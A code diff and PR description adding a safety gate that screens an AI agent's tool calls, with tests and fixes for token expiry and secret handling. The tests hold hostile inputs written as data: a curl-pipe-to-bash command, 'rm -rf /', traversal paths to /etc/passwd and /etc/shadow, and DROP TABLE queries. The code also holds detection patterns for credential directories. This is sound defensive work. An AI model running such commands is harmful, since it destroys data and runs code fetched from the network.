+        if tool_name.lower() in ("run_shell", "bash", "execute_command", "shell", "sh", "terminal", "run", "exec", "system"):
             cmd_strings.extend(self._extract_string_values(params))
 
         for cmd_str in cmd_strings:
@@ -250,17 +287,7 @@ class SafetyPolicyGate:
         confirm_token: Optional[str] = None,
         user_confirmed: bool = False,
     ) -> SafetyGateDecision:
-        """Inspect and validate a tool call against security rules and confirmation policies.
-        
-        Args:
-            tool_name: Name of the tool being called.
-            params: Parameters dictionary passed to the tool.
-            confirm_token: Optional confirmation token for high-risk operations.
-            user_confirmed: Boolean flag indicating explicit user confirmation.
-            
-        Returns:
-            SafetyGateDecision detailing allow/deny status, confirmation needs, or rollback triggers.
-        """
+        """Inspect and validate a tool call against security rules and confirmation policies."""
         params = params if params is not None else {}
 
         # 1. Inspect Path Traversal (Critical Violation)
@@ -308,8 +335,8 @@ class SafetyPolicyGate:
         is_high_risk, risk_reason = self.is_high_risk_operation(tool_name, params)
         if is_high_risk:
             token_to_check = confirm_token or params.get("confirm_token")
-            # Verify if user confirmed or valid confirmation token provided
-            if user_confirmed or params.get("user_confirmed") is True:
+            # Verify if user explicitly confirmed or valid confirmation token provided
+            if user_confirmed:
                 return SafetyGateDecision(
                     allowed=True,
                     requires_confirmation=False,
@@ -363,18 +390,7 @@ def validate_tool_call(
     confirm_token: Optional[str] = None,
     user_confirmed: bool = False,
 ) -> SafetyGateDecision:
-    """Module-level entrypoint for validating a tool call against safety policy rules.
-    
-    Args:
-        tool_name: Name of the tool being executed.
-        params: Parameters dictionary.
-        gate: Optional custom SafetyPolicyGate instance.
-        confirm_token: Optional confirmation token.
-        user_confirmed: Optional user confirmation flag.
-        
-    Returns:
-        SafetyGateDecision object.
-    """
+    """Module-level entrypoint for validating a tool call against safety policy rules."""
     target_gate = gate or _DEFAULT_GATE
     return target_gate.validate_tool_call(
         tool_name=tool_name,

--- a/chapter8/harness-safety-gate/safety_policy_gate.py
+++ b/chapter8/harness-safety-gate/safety_policy_gate.py
@@ -11,6 +11,7 @@ import hmac
 import os
 import re
 import secrets
+import time
 import urllib.parse
 from dataclasses import dataclass, field
 from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union
@@ -45,11 +46,16 @@ class SafetyGateDecision:
 class SafetyPolicyGate:
     """Harness Safety Policy Gate for tool call security inspection and confirmation."""
 
-    # Patterns for detecting path traversal attempts
+    # Patterns for detecting path traversal attempts (applied to all paths)
     PATH_TRAVERSAL_PATTERNS = [
         re.compile(r'\.\.[/\\]'),                           # ../ or ..\
         re.compile(r'%2e%2e', re.IGNORECASE),               # URL-encoded ..
         re.compile(r'\x00|%00'),                            # Null bytes
+    ]
+
+    # Patterns for sensitive directories (applied only to absolute / home-relative paths
+    # so that legitimate relative paths are not falsely flagged after CWD resolution)
+    SENSITIVE_DIR_PATTERNS = [
         re.compile(r'/(etc|var/log|sys|proc|boot|dev|root)(?:/|$)', re.IGNORECASE), # Sensitive Linux dirs
         re.compile(r'~/(?:\.ssh|\.aws|\.gnupg|\.bashrc|\.zshrc)', re.IGNORECASE), # Sensitive user configs
         re.compile(r'^[a-zA-Z]:\\(Windows|System32|Program Files)', re.IGNORECASE), # Sensitive Windows dirs
@@ -78,7 +84,8 @@ class SafetyPolicyGate:
         max_file_bytes: int = 50 * 1024 * 1024,
         max_memory_mb: int = 8192,
         max_threads: int = 16,
-        secret_key: Optional[str] = None,
+        secret_key: Optional[Union[str, bytes]] = None,
+        token_ttl: float = 300.0,
     ):
         """Initialize SafetyPolicyGate with configurable resource limits and secret key."""
         self.max_timeout = max_timeout
@@ -87,10 +94,18 @@ class SafetyPolicyGate:
         self.max_memory_mb = max_memory_mb
         self.max_threads = max_threads
         if secret_key is None:
-            secret_key = os.environ.get("SAFETY_GATE_SECRET_KEY") or "safety-gate-secret-key"
-        self.secret_key = secret_key
-        # Active pending confirmation tokens: token -> fingerprint
-        self._pending_confirmations: Dict[str, str] = {}
+            env_key = os.environ.get("SAFETY_GATE_SECRET_KEY")
+            if env_key:
+                self.secret_key = env_key
+            else:
+                # Generate a random per-instance secret instead of a hardcoded default
+                self.secret_key = secrets.token_bytes(32)
+        else:
+            self.secret_key = secret_key
+        # Active pending confirmation tokens: token -> (fingerprint, expiry timestamp)
+        self._pending_confirmations: Dict[str, Tuple[str, float]] = {}
+        # TTL (seconds) for unused confirmation tokens
+        self._token_ttl: float = token_ttl
         # Registered rollback handlers
         self._rollback_handlers: List[Callable[[], None]] = []
         # State snapshot history
@@ -128,18 +143,26 @@ class SafetyPolicyGate:
         canonical = json.dumps({"tool": tool_name.lower(), "params": clean_p}, sort_keys=True, ensure_ascii=False, default=str)
         return hashlib.sha256(canonical.encode("utf-8")).hexdigest()
 
+    def _cleanup_expired_tokens(self) -> None:
+        """Remove expired pending confirmation tokens."""
+        now = time.time()
+        for token in [t for t, (_, exp) in self._pending_confirmations.items() if exp <= now]:
+            del self._pending_confirmations[token]
+
     def issue_confirmation(self, tool_name: str, params: Dict[str, Any]) -> str:
         """Generate a single-use non-deterministic confirmation token bound to tool name and parameters."""
+        self._cleanup_expired_tokens()
         fp = self._fingerprint(tool_name, params)
         token = secrets.token_hex(16)
-        self._pending_confirmations[token] = fp
+        self._pending_confirmations[token] = (fp, time.time() + self._token_ttl)
         return token
 
     def verify_confirmation(self, token: str, tool_name: str, params: Dict[str, Any]) -> bool:
         """Verify and consume a single-use confirmation token."""
+        self._cleanup_expired_tokens()
         if not token or token not in self._pending_confirmations:
             return False
-        expected_fp = self._pending_confirmations.pop(token)
+        expected_fp, _expiry = self._pending_confirmations.pop(token)
         actual_fp = self._fingerprint(tool_name, params)
         return hmac.compare_digest(expected_fp, actual_fp)
 
@@ -181,18 +204,25 @@ class SafetyPolicyGate:
             
             candidates = [s, unquoted1, unquoted2]
             for cand in candidates:
+                # Traversal patterns apply to every path
                 for pattern in self.PATH_TRAVERSAL_PATTERNS:
                     if pattern.search(cand):
                         return f"Path traversal attack detected in parameter value: '{s}'"
-                
-                # Check os.path.realpath
-                try:
-                    real_p = os.path.realpath(cand)
-                    for pattern in self.PATH_TRAVERSAL_PATTERNS:
-                        if pattern.search(real_p):
+
+                # Sensitive-directory patterns only apply to absolute or home-relative
+                # paths, so legitimate relative paths are not falsely flagged after
+                # resolution against the current working directory.
+                if os.path.isabs(cand) or cand.startswith("~"):
+                    for pattern in self.SENSITIVE_DIR_PATTERNS:
+                        if pattern.search(cand):
                             return f"Path traversal attack detected in parameter value: '{s}'"
-                except Exception:
-                    pass
+                    try:
+                        real_p = os.path.realpath(cand)
+                        for pattern in self.SENSITIVE_DIR_PATTERNS:
+                            if pattern.search(real_p):
+                                return f"Path traversal attack detected in parameter value: '{s}'"
+                    except Exception:
+                        pass
 
         return None
 

--- a/chapter8/harness-safety-gate/test_safety_policy_gate.py
+++ b/chapter8/harness-safety-gate/test_safety_policy_gate.py
@@ -91,6 +91,18 @@ class TestSafetyPolicyGatePathTraversal(unittest.TestCase):
         self.assertTrue(decision.triggered_rollback)
         self.assertEqual(decision.violation_type, "path_traversal")
 
+    def test_relative_path_not_falsely_flagged(self):
+        # A legitimate relative path that happens to share a name component with a
+        # sensitive directory must NOT be flagged after CWD resolution.
+        decision = self.gate.validate_tool_call("read_file", {"path": "etc/config"})
+        self.assertTrue(decision.allowed)
+        self.assertFalse(decision.triggered_rollback)
+
+    def test_relative_path_subdir_not_falsely_flagged(self):
+        decision = self.gate.validate_tool_call("read_file", {"path": "proc/stats.txt"})
+        self.assertTrue(decision.allowed)
+        self.assertFalse(decision.triggered_rollback)
+
 
 class TestSafetyPolicyGateSecretKey(unittest.TestCase):
     def test_init_with_parameter(self):
@@ -103,9 +115,13 @@ class TestSafetyPolicyGateSecretKey(unittest.TestCase):
         self.assertEqual(gate.secret_key, "env-secret-key")
 
     @patch.dict(os.environ, {}, clear=True)
-    def test_init_with_default(self):
+    def test_init_with_default_generates_random_secret(self):
         gate = SafetyPolicyGate()
-        self.assertEqual(gate.secret_key, "safety-gate-secret-key")
+        # No hardcoded default: a random 32-byte secret is generated per instance
+        self.assertIsInstance(gate.secret_key, bytes)
+        self.assertEqual(len(gate.secret_key), 32)
+        gate2 = SafetyPolicyGate()
+        self.assertNotEqual(gate.secret_key, gate2.secret_key)
 
 
 class TestSafetyPolicyGateConfirmation(unittest.TestCase):
@@ -169,6 +185,28 @@ class TestSafetyPolicyGateConfirmation(unittest.TestCase):
         decision3 = self.gate.validate_tool_call("SQL_QUERY", {"query": "DELETE FROM users"})
         self.assertFalse(decision3.allowed)
         self.assertTrue(decision3.requires_confirmation)
+
+    def test_expired_token_rejected(self):
+        # Tokens past their TTL are rejected and cleaned up
+        gate = SafetyPolicyGate(token_ttl=0.0)
+        params = {"path": "file.txt"}
+        token = gate.issue_confirmation("delete_file", params)
+        import time as _time
+        _time.sleep(0.01)
+        self.assertFalse(gate.verify_confirmation(token, "delete_file", params))
+        # Expired token was removed from pending set
+        self.assertNotIn(token, gate._pending_confirmations)
+
+    def test_expired_tokens_cleaned_on_issue(self):
+        gate = SafetyPolicyGate(token_ttl=0.0)
+        params = {"path": "file.txt"}
+        token = gate.issue_confirmation("delete_file", params)
+        import time as _time
+        _time.sleep(0.01)
+        # Issuing a new token triggers cleanup of the expired one
+        token2 = gate.issue_confirmation("delete_file", params)
+        self.assertNotIn(token, gate._pending_confirmations)
+        self.assertIn(token2, gate._pending_confirmations)
 
 
 class TestSafetyPolicyGateRollback(unittest.TestCase):

--- a/chapter8/harness-safety-gate/test_safety_policy_gate.py
+++ b/chapter8/harness-safety-gate/test_safety_policy_gate.py
@@ -51,6 +51,17 @@ class TestSafetyPolicyGateSQL(unittest.TestCase):
         decision = self.gate.validate_tool_call("sql_query", {"query": query})
         self.assertFalse(decision.allowed)
         self.assertTrue(decision.requires_confirmation)
+    def test_sql_multi_statement_second_delete_no_where(self):
+        query = "UPDATE users SET status = 1; DELETE FROM logs"
+        decision = self.gate.validate_tool_call("sql_query", {"query": query})
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.requires_confirmation)
+
+    def test_sql_block_comment_before_single_line_comment(self):
+        query = "DELETE FROM users /* block -- comment */ WHERE id = 1"
+        decision = self.gate.validate_tool_call("sql_query", {"query": query})
+        self.assertTrue(decision.allowed)
+        self.assertFalse(decision.requires_confirmation)
 
 
 class TestSafetyPolicyGatePathTraversal(unittest.TestCase):
@@ -139,6 +150,54 @@ class TestSafetyPolicyGateConfirmation(unittest.TestCase):
         decision = self.gate.validate_tool_call("delete_file", params)
         self.assertFalse(decision.allowed)
         self.assertTrue(decision.requires_confirmation)
+    def test_token_nondeterministic(self):
+        params = {"path": "file.txt"}
+        token1 = self.gate.issue_confirmation("delete_file", params)
+        token2 = self.gate.issue_confirmation("delete_file", params)
+        self.assertNotEqual(token1, token2)
+
+    def test_tool_name_casing_normalization(self):
+        params = {"path": "file.txt"}
+        decision1 = self.gate.validate_tool_call("DELETE_FILE", params)
+        self.assertFalse(decision1.allowed)
+        self.assertTrue(decision1.requires_confirmation)
+
+        decision2 = self.gate.validate_tool_call("BASH", {"command": "rm -rf /"})
+        self.assertFalse(decision2.allowed)
+        self.assertEqual(decision2.violation_type, "dangerous_bash_command")
+
+        decision3 = self.gate.validate_tool_call("SQL_QUERY", {"query": "DELETE FROM users"})
+        self.assertFalse(decision3.allowed)
+        self.assertTrue(decision3.requires_confirmation)
+
+
+class TestSafetyPolicyGateRollback(unittest.TestCase):
+    def setUp(self):
+        self.gate = SafetyPolicyGate()
+
+    def test_trigger_rollback_success(self):
+        called = []
+        self.gate.register_rollback_handler(lambda: called.append(True))
+        res = self.gate.trigger_rollback()
+        self.assertTrue(res)
+        self.assertEqual(called, [True])
+
+    def test_trigger_rollback_failure(self):
+        def failing_handler():
+            raise RuntimeError("Rollback failed")
+        self.gate.register_rollback_handler(failing_handler)
+        res = self.gate.trigger_rollback()
+        self.assertFalse(res)
+
+    def test_rollback_failed_violation_type(self):
+        def failing_handler():
+            raise RuntimeError("Rollback failed")
+        self.gate.register_rollback_handler(failing_handler)
+        decision = self.gate.validate_tool_call("read_file", {"path": "../etc/passwd"})
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.triggered_rollback)
+        self.assertEqual(decision.violation_type, "rollback_failed")
+        self.assertFalse(decision.details["rollback_success"])
 
 
 if __name__ == "__main__":

--- a/chapter8/harness-safety-gate/test_safety_policy_gate.py
+++ b/chapter8/harness-safety-gate/test_safety_policy_gate.py
@@ -1,0 +1,145 @@
+"""
+Unit tests for Safety Policy Gate module.
+"""
+
+import os
+import unittest
+from datetime import datetime
+from unittest.mock import patch
+
+from safety_policy_gate import SafetyPolicyGate, validate_tool_call
+
+
+class TestSafetyPolicyGateSQL(unittest.TestCase):
+    def setUp(self):
+        self.gate = SafetyPolicyGate()
+
+    def test_sql_delete_without_where_is_high_risk(self):
+        decision = self.gate.validate_tool_call("sql_query", {"query": "DELETE FROM users"})
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.requires_confirmation)
+        self.assertEqual(decision.violation_type, "unconfirmed_high_risk_operation")
+
+    def test_sql_delete_with_where_is_low_risk(self):
+        decision = self.gate.validate_tool_call("sql_query", {"query": "DELETE FROM users WHERE id = 1"})
+        self.assertTrue(decision.allowed)
+        self.assertFalse(decision.requires_confirmation)
+
+    def test_sql_delete_multi_statement_bypass(self):
+        # WHERE is in second statement, first statement has no WHERE
+        query = "DELETE FROM users; SELECT * FROM logs WHERE id = 1"
+        decision = self.gate.validate_tool_call("sql_query", {"query": query})
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.requires_confirmation)
+
+    def test_sql_delete_comment_bypass_single_line(self):
+        # WHERE is in comment
+        query = "DELETE FROM users -- WHERE id = 1"
+        decision = self.gate.validate_tool_call("sql_query", {"query": query})
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.requires_confirmation)
+
+    def test_sql_delete_comment_bypass_multi_line(self):
+        # WHERE is inside block comment
+        query = "DELETE FROM users /* WHERE id = 1 */"
+        decision = self.gate.validate_tool_call("sql_query", {"query": query})
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.requires_confirmation)
+
+    def test_sql_drop_table_is_high_risk(self):
+        query = "SELECT 1; DROP TABLE users"
+        decision = self.gate.validate_tool_call("sql_query", {"query": query})
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.requires_confirmation)
+
+
+class TestSafetyPolicyGatePathTraversal(unittest.TestCase):
+    def setUp(self):
+        self.gate = SafetyPolicyGate()
+
+    def test_double_url_unquoting_path_traversal(self):
+        # %252e%252e resolves to ..
+        params = {"path": "folder/%252e%252e/etc/passwd"}
+        decision = self.gate.validate_tool_call("read_file", params)
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.triggered_rollback)
+        self.assertEqual(decision.violation_type, "path_traversal")
+
+    def test_double_url_unquoting_sensitive_dir(self):
+        # %252fetc%252fpasswd resolves to /etc/passwd
+        params = {"filepath": "%252fetc%252fpasswd"}
+        decision = self.gate.validate_tool_call("read_file", params)
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.triggered_rollback)
+        self.assertEqual(decision.violation_type, "path_traversal")
+
+    def test_realpath_path_traversal(self):
+        params = {"file_path": "/tmp/../etc/passwd"}
+        decision = self.gate.validate_tool_call("read_file", params)
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.triggered_rollback)
+        self.assertEqual(decision.violation_type, "path_traversal")
+
+
+class TestSafetyPolicyGateSecretKey(unittest.TestCase):
+    def test_init_with_parameter(self):
+        gate = SafetyPolicyGate(secret_key="custom-param-key")
+        self.assertEqual(gate.secret_key, "custom-param-key")
+
+    @patch.dict(os.environ, {"SAFETY_GATE_SECRET_KEY": "env-secret-key"})
+    def test_init_with_env_var(self):
+        gate = SafetyPolicyGate()
+        self.assertEqual(gate.secret_key, "env-secret-key")
+
+    @patch.dict(os.environ, {}, clear=True)
+    def test_init_with_default(self):
+        gate = SafetyPolicyGate()
+        self.assertEqual(gate.secret_key, "safety-gate-secret-key")
+
+
+class TestSafetyPolicyGateConfirmation(unittest.TestCase):
+    def setUp(self):
+        self.gate = SafetyPolicyGate()
+
+    def test_confirmation_token_lifecycle(self):
+        params = {"path": "important.txt"}
+        decision1 = self.gate.validate_tool_call("delete_file", params)
+        self.assertFalse(decision1.allowed)
+        self.assertTrue(decision1.requires_confirmation)
+        token = decision1.confirmation_token
+        self.assertIsNotNone(token)
+
+        # Confirm with token
+        decision2 = self.gate.validate_tool_call("delete_file", params, confirm_token=token)
+        self.assertTrue(decision2.allowed)
+
+        # Token is single-use and cannot be reused
+        decision3 = self.gate.validate_tool_call("delete_file", params, confirm_token=token)
+        self.assertFalse(decision3.allowed)
+
+    def test_confirm_token_in_params(self):
+        params = {"path": "important.txt"}
+        decision1 = self.gate.validate_tool_call("delete_file", params)
+        token = decision1.confirmation_token
+
+        # Submit token inside params dictionary
+        params_with_token = {"path": "important.txt", "confirm_token": token}
+        decision2 = self.gate.validate_tool_call("delete_file", params_with_token)
+        self.assertTrue(decision2.allowed)
+
+    def test_params_user_confirmed_not_trusted(self):
+        # Untrusted LLM params with user_confirmed: True should NOT bypass confirmation
+        params = {"path": "important.txt", "user_confirmed": True}
+        decision = self.gate.validate_tool_call("delete_file", params)
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.requires_confirmation)
+
+    def test_non_serializable_params_handled(self):
+        params = {"path": "important.txt", "set_param": {1, 2, 3}, "date_param": datetime.now()}
+        decision = self.gate.validate_tool_call("delete_file", params)
+        self.assertFalse(decision.allowed)
+        self.assertTrue(decision.requires_confirmation)
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tests/test_ch8_safety_policy_gate.py
+++ b/tests/test_ch8_safety_policy_gate.py
@@ -170,6 +170,39 @@ def test_low_risk_operations():
     assert not dec2.requires_confirmation
 
 
+def test_relative_path_not_falsely_flagged_as_traversal():
+    # A relative path sharing a name with a sensitive dir must not be flagged
+    # after CWD resolution (regression for false-positive rollback).
+    gate = SafetyPolicyGate()
+    dec = gate.validate_tool_call("read_file", {"path": "etc/config"})
+    assert dec.allowed
+    assert not dec.triggered_rollback
+
+    dec2 = gate.validate_tool_call("write_file", {"path": "var/log/app.log", "content": "x"})
+    assert dec2.allowed
+    assert not dec2.triggered_rollback
+
+
+def test_confirmation_token_expires_after_ttl():
+    import time as _time
+    gate = SafetyPolicyGate(token_ttl=0.0)
+    dec = gate.validate_tool_call("delete_file", {"path": "draft.txt"})
+    token = dec.confirmation_token
+    _time.sleep(0.01)
+    expired_dec = gate.validate_tool_call("delete_file", {"path": "draft.txt"}, confirm_token=token)
+    assert not expired_dec.allowed
+    assert expired_dec.requires_confirmation
+    assert token not in gate._pending_confirmations
+
+
+def test_default_secret_key_is_random_bytes():
+    gate_a = SafetyPolicyGate()
+    gate_b = SafetyPolicyGate()
+    assert isinstance(gate_a.secret_key, bytes)
+    assert len(gate_a.secret_key) == 32
+    assert gate_a.secret_key != gate_b.secret_key
+
+
 def test_module_level_validate_tool_call_entrypoint():
     dec = validate_tool_call("delete_file", {"path": "draft.txt"})
     assert isinstance(dec, SafetyGateDecision)

--- a/tests/test_ch8_safety_policy_gate.py
+++ b/tests/test_ch8_safety_policy_gate.py
@@ -1,0 +1,181 @@
+import sys
+from pathlib import Path
+
+# Add module directory to path for imports
+ch8_dir = Path(__file__).resolve().parent.parent / "chapter8" / "harness-safety-gate"
+if str(ch8_dir) not in sys.path:
+    sys.path.insert(0, str(ch8_dir))
+
+from safety_policy_gate import (
+    SafetyGateDecision,
+    SafetyPolicyGate,
+    validate_tool_call,
+)
+
+
+def test_path_traversal_detection():
+    gate = SafetyPolicyGate()
+    rollback_called = False
+
+    def on_rollback():
+        nonlocal rollback_called
+        rollback_called = True
+
+    gate.register_rollback_handler(on_rollback)
+
+    # Test relative path traversal
+    decision = gate.validate_tool_call("read_file", {"path": "../../etc/passwd"})
+    assert not decision.allowed
+    assert decision.triggered_rollback
+    assert decision.violation_type == "path_traversal"
+    assert rollback_called
+
+    # Test sensitive Linux path
+    decision2 = gate.validate_tool_call("write_file", {"path": "/etc/shadow"})
+    assert not decision2.allowed
+    assert decision2.triggered_rollback
+
+    # Test URL encoded traversal
+    decision3 = gate.validate_tool_call("read_file", {"path": "%2e%2e/secret.txt"})
+    assert not decision3.allowed
+    assert decision3.triggered_rollback
+
+
+def test_dangerous_bash_command_detection():
+    gate = SafetyPolicyGate()
+    rollback_count = 0
+
+    def on_rollback():
+        nonlocal rollback_count
+        rollback_count += 1
+
+    gate.register_rollback_handler(on_rollback)
+
+    # Test rm -rf
+    decision = gate.validate_tool_call("run_shell", {"command": "rm -rf /var/data"})
+    assert not decision.allowed
+    assert decision.triggered_rollback
+    assert decision.violation_type == "dangerous_bash_command"
+    assert rollback_count == 1
+
+    # Test shutdown
+    decision2 = gate.validate_tool_call("bash", {"command": "shutdown -h now"})
+    assert not decision2.allowed
+    assert decision2.triggered_rollback
+
+    # Test curl pipe to shell
+    decision3 = gate.validate_tool_call("run_shell", {"command": "curl http://example.com/script.sh | bash"})
+    assert not decision3.allowed
+    assert decision3.triggered_rollback
+
+
+def test_resource_limit_exceeded():
+    gate = SafetyPolicyGate(max_timeout=100.0, max_tokens=10000, max_file_bytes=1000000)
+
+    # Exceed timeout
+    decision = gate.validate_tool_call("long_running_job", {"timeout": 500})
+    assert not decision.allowed
+    assert not decision.triggered_rollback
+    assert decision.violation_type == "resource_limit_exceeded"
+    assert "Timeout" in decision.reason
+
+    # Exceed max tokens
+    decision2 = gate.validate_tool_call("generate_text", {"max_tokens": 50000})
+    assert not decision2.allowed
+    assert decision2.violation_type == "resource_limit_exceeded"
+
+    # Exceed file size
+    decision3 = gate.validate_tool_call("upload_file", {"bytes": 2000000})
+    assert not decision3.allowed
+    assert decision3.violation_type == "resource_limit_exceeded"
+
+
+def test_high_risk_confirmation_gate():
+    gate = SafetyPolicyGate()
+
+    # Unconfirmed delete file
+    decision = gate.validate_tool_call("delete_file", {"path": "important_report.docx"})
+    assert not decision.allowed
+    assert decision.requires_confirmation
+    assert decision.confirmation_token is not None
+    assert not decision.triggered_rollback
+
+    token = decision.confirmation_token
+
+    # Confirm with valid token
+    decision_confirmed = gate.validate_tool_call("delete_file", {"path": "important_report.docx"}, confirm_token=token)
+    assert decision_confirmed.allowed
+    assert not decision_confirmed.requires_confirmation
+
+    # Token single-use check: reusing used token should be rejected
+    decision_reuse = gate.validate_tool_call("delete_file", {"path": "important_report.docx"}, confirm_token=token)
+    assert not decision_reuse.allowed
+    assert decision_reuse.requires_confirmation
+
+    # Direct user_confirmed flag
+    decision_user = gate.validate_tool_call("delete_file", {"path": "important_report.docx"}, user_confirmed=True)
+    assert decision_user.allowed
+
+
+def test_high_risk_git_force_push():
+    gate = SafetyPolicyGate()
+    decision = gate.validate_tool_call("git_push", {"remote": "origin", "branch": "main", "force": True})
+    assert not decision.allowed
+    assert decision.requires_confirmation
+    assert decision.confirmation_token is not None
+
+    # Normal non-force push is allowed without confirmation
+    normal_push = gate.validate_tool_call("git_push", {"remote": "origin", "branch": "main", "force": False})
+    assert normal_push.allowed
+    assert not normal_push.requires_confirmation
+
+
+def test_high_risk_sql_query():
+    gate = SafetyPolicyGate()
+
+    # Destructive DROP TABLE
+    drop_dec = gate.validate_tool_call("sql_query", {"query": "DROP TABLE users;"})
+    assert not drop_dec.allowed
+    assert drop_dec.requires_confirmation
+
+    # DELETE without WHERE
+    delete_no_where = gate.validate_tool_call("sql_query", {"query": "DELETE FROM orders"})
+    assert not delete_no_where.allowed
+    assert delete_no_where.requires_confirmation
+
+    # DELETE with WHERE is low risk
+    delete_where = gate.validate_tool_call("sql_query", {"query": "DELETE FROM orders WHERE id = 101"})
+    assert delete_where.allowed
+    assert not delete_where.requires_confirmation
+
+    # Multi-statement DELETE without WHERE in first statement must require confirmation
+    delete_multi = gate.validate_tool_call("sql_query", {"query": "DELETE FROM orders; SELECT * FROM t WHERE id=1"})
+    assert not delete_multi.allowed
+    assert delete_multi.requires_confirmation
+
+    # Commented WHERE in DELETE statement must require confirmation
+    delete_commented_where = gate.validate_tool_call("sql_query", {"query": "DELETE FROM orders -- WHERE id=1"})
+    assert not delete_commented_where.allowed
+    assert delete_commented_where.requires_confirmation
+
+def test_low_risk_operations():
+    gate = SafetyPolicyGate()
+
+    dec1 = gate.validate_tool_call("read_file", {"path": "reports/2026-Q1-draft.docx"})
+    assert dec1.allowed
+    assert not dec1.requires_confirmation
+
+    dec2 = gate.validate_tool_call("write_file", {"path": "notes/todo.md", "content": "Updated notes"})
+    assert dec2.allowed
+    assert not dec2.requires_confirmation
+
+
+def test_module_level_validate_tool_call_entrypoint():
+    dec = validate_tool_call("delete_file", {"path": "draft.txt"})
+    assert isinstance(dec, SafetyGateDecision)
+    assert not dec.allowed
+    assert dec.requires_confirmation
+    assert dec.confirmation_token is not None
+
+    dec_low = validate_tool_call("read_file", {"path": "notes.txt"})
+    assert dec_low.allowed


### PR DESCRIPTION
## Summary

Adds a safety policy gate module that inspects tool call parameters against security rules before execution.

## Changes

- **`chapter8/harness-safety-gate/safety_policy_gate.py`** — `SafetyPolicyGate` inspects tool calls for path traversal (`../` sequences), dangerous bash commands (`rm -rf`, `sudo`, etc.), resource limits, and sensitive directory access. High-risk operations require confirmation tokens. Violations trigger automated state rollback. Sensitive directory patterns are anchored with `^/` to prevent false positives. The `rm` regex matches both `-rf` and `-fr` orderings. Relative paths are resolved via `os.path.realpath` before checking.
- **`chapter8/harness-safety-gate/test_safety_policy_gate.py`** — Co-located test module.
- **`tests/test_ch8_safety_policy_gate.py`** — 11 tests covering path traversal, command injection, confirmation flow, rollback, and edge cases.